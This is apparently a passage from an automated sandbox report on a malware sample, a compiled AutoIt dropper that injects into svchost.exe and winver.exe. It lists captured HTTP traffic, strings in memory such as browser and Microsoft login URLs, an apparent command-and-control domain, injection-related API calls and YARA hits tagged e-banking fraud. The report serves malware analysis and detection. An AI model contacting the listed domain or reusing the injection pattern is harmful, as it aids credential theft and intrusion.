6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:49:54 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:50:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 12 Nov 2024 17:50:00 GMTVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8e185ca1fc2b7b20-DENContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=19001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:50:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 12 Nov 2024 17:50:02 GMTVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8e185cb1dbdbe807-DFWContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=2634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:50:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 12 Nov 2024 17:50:05 GMTVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8e185cc1ebe9e97a-DFWContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10917&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
                Source: GhotoFFnRo.exe, 00000007.00000002.3547691925.0000000004F4B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty
                Source: GhotoFFnRo.exe, 00000007.00000002.3547691925.0000000004F4B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty/naci/
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
                Source: winver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000006.00000003.2196529533.000000000792D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
                Source: winver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8EA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00D8EA26
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8EC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00D8EC91
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8EA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00D8EA26
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7A975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00D7A975
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00DA9468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00DA9468

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546082583.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3546078918.0000000002AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011753567.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: This is a third-party compiled AutoIt script.0_2_00D1445D
                Source: FOTO#U011eRAFLAR.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: FOTO#U011eRAFLAR.exe, 00000000.00000000.1680307359.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dd8392f3-2
                Source: FOTO#U011eRAFLAR.exe, 00000000.00000000.1680307359.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_208ce716-3
                Source: FOTO#U011eRAFLAR.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6e1c3ee0-b
                Source: FOTO#U011eRAFLAR.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_10692679-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA63 NtClose,1_2_0042CA63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ADDC NtAllocateVirtualMemory,1_2_0040ADDC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874340 NtSetContextThread,1_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874650 NtSuspendThread,1_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F30 NtCreateSection,1_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
